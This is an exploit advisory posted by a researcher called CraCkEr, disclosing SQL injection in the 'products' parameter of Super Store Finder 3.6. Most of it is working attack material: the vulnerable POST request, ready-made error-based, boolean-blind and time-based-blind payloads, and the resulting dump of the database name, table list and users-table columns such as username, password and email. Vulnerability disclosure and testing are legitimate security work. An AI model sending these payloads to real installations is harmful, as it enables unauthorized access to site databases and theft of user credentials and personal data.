Super Store Finder 3.6 SQL Injection

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack…. ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://codecanyon.net/item/super-store-finder/3630922 │
│ Vendor : Super Store Finder │
│ Software : Super Store Finder 3.6 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company’s reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka

CryptoJob (Twitter) twitter.com/0x0CryptoJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php

———————————————————————————
POST /products/superstorefinder/index.php HTTP/1.1

ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347[SQLI] ———————————————————————————

POST parameter ‘products’ is vulnerable to SQL Injection

—
Parameter: products (POST)
Type: error-based
Title: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347′ AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)– wXyW

Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347′ AND 04872=4872– wXyW

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF – comment)
Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347’XOR(IF(now()=sysdate(),SLEEP(6),0))XOR’Z
—

[+] Starting the Attack

fetching current database
current database: ‘superstor_***’

fetching tables

[8 tables] +————–+
| categories_b |
| categories |
| stores_c |
| categories_c |
| stores_b |
| users_b |
| users |
| stores |
+————–+

fetching columns for table ‘users’

[11 columns] +————-+
| id |
| username |
| password |
| firstname |
| lastname |
| facebook_id |
| address |
| email |
| created |
| modified |
| status |
+————-+

[-] Done